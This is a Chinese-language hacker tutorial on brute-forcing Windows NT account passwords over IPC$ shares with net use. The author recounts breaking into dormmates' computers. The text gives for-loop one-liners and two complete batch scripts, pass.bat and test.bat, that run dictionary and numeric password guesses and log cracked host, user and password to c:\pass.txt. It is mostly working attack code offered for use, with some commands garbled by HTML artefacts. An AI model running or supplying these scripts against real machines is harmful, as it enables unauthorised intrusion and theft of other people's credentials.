用Dos命令破解远程NT服务器用户密码

          用Dos命令破解远程NT服务器用户密码
    知道一个NT帐户与密码，就可以用 net use \\主机\ipc$Content$nbsp;”密码”

/user:”用户”  与远程主机建立连接，这是每一个黑客或是梦想成为又或是正在努力成

为黑客的朋友都知道的方法，甚至连菜鸟都算不上的小鸟都知道，我也仅仅知

道这一条，我就用我仅仅知道的这一条在宿舍网里进入别人的电脑，因为他们的电脑密

码都为空，被他们发现了之后狠K了一顿，然后纷纷加上了密码，这下可没戏了，想去偷

窥他们的密码他们又防范得紧，只得想其他办法，也许各位大虾们就会利用其他方法，

诸如寻找系统之类得到管理权限，而我不行，因为我前面说过，我只会那一条，那又会

有人说用软件暴力破解密码就可以了，也许不错，但首先我没有那些高深的软件也没有

天赋去研究那些复杂的用法，却在无意间看DOS帮助时发现了一些命令，当真是天无绝人

之路：

    1、字典：for /f %i in (字典文件) do net use \\主机\ipc$Content$nbsp;”%i”

/user:”用户”

    2、数字：for /l %i in (start,step,end) do net use \\主机

\ipc$Content$nbsp;”%i” /user:”用户”

    以上可参看DOS里面for帮助，还别说，真让我给连上几台机子，可问题也随之而来

，连是连上了，我仍然不知道密码，下次要用还得重新全部试过。

    正失望，无意间又发现了一个好方法，也许是我太笨，也许你们更聪明，，说不定

你们早已经发现了，不再说废话，下面就将方法全部给出，请各位大虾指正：

将下面文件存为pass.bat:

@echo off

echo ——————————————————————-

>>c:\pass.txt

echo ——————————————————————-

>>c:\pass.txt

date /t >>c:\pass.txt

time /t >>c:\pass.txt

echo 破解结果： >>c:\pass.txt

if “%6″==”1” goto shit2

:shit1

start “正在破解” /min cmd /c for /f %%i in (%1) do call test.bat %2 “%%i” %3

goto quit

:shit2

start “正在破解” /min cmd /c for /l %%i in (%1,%2,%3) do call test.bat %4 “%

%i” %5

:quit

 

将下面文件存为test.bat:

net use \\%1\ipc$Content$nbsp;%2 /user:”%3″

goto answer%ERRORLEVEL%

rem %ERRORLEVEL%表示取前一命令执行返回结果，net use成功返回0，失败返回2

:answer0

echo 远程主机：”%1″ >>c:\pass.txt

echo 用 户：”%3″ >>c:\pass.txt

echo 密 码：%2 >>c:\pass.txt

net use \\%1\ipc$Content$nbsp;/delet

exit

:answer2

 

将pass.bat与test.bat存放于system32中，用法如下：

1、如果用字典破解：pass.bat 字典文件路径及名称 主机 用户名

2、如果用数字破解：pass.bat 起始数 步长 结束数 主机 用户名 1

密码破解出来之后，存放于c:\pass.txt文件里面。

另外，我做的这些只是在局域网内测试，如果远程测试，受网速限制，具体情况只能靠

自己去摸索了 。